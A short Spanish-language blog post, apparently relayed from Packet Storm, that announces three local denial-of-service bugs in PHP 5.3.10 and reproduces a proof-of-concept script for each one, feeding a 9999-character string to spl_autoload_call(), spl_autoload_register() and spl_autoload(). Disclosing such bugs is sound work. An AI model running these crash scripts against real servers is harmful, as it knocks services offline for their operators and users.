Se han descubierto tres nuevas vulnerabilidades que provocan denegación de servicio en PHP 5.3.10. Estas se dan a nivel local al llamar a a las funciones spl_autoload_call() , spl_autoload_register() o spl_autoload() con un parámetro de longitud igual o superior a 9999 caracteres.
spl_autoload_call()
[php] <?php ##################################################################### ## PHP 5.3.10 spl_autoload_call() Local Denial of Service ## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10 ## Date: 02/06/2012 ## Local Denial of Service ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com> ## ISRAEL ## http://www.0x31337.net ##################################################################### $buffer = str_repeat("A",9999); spl_autoload_call($buffer); ?> [/php]
spl_autoload_register()
[php] <?php ##################################################################### ## PHP 5.3.10 spl_autoload_register() Local Denial of Service ## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10 ## Date: 02/06/2012 ## Local Denial of Service ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com> ## ISRAEL ## http://www.0x31337.net ##################################################################### $buffer = str_repeat("A",9999); spl_autoload_register($buffer); ## Or.. # spl_autoload_register($buffer,1,1); #Should work too. ?> [/php]
spl_autoload()
[php] <?php ##################################################################### ## PHP 5.3.10 spl_autoload() Local Denial of Service ## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10 ## Date: 02/06/2012 ## Local Denial of Service ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com> ## ISRAEL ## http://www.0x31337.net ##################################################################### $buff = str_repeat("A",9999); spl_autoload($buff); ?> [/php]
Vía http://packetstormsecurity.org
No hay comentarios:
Publicar un comentario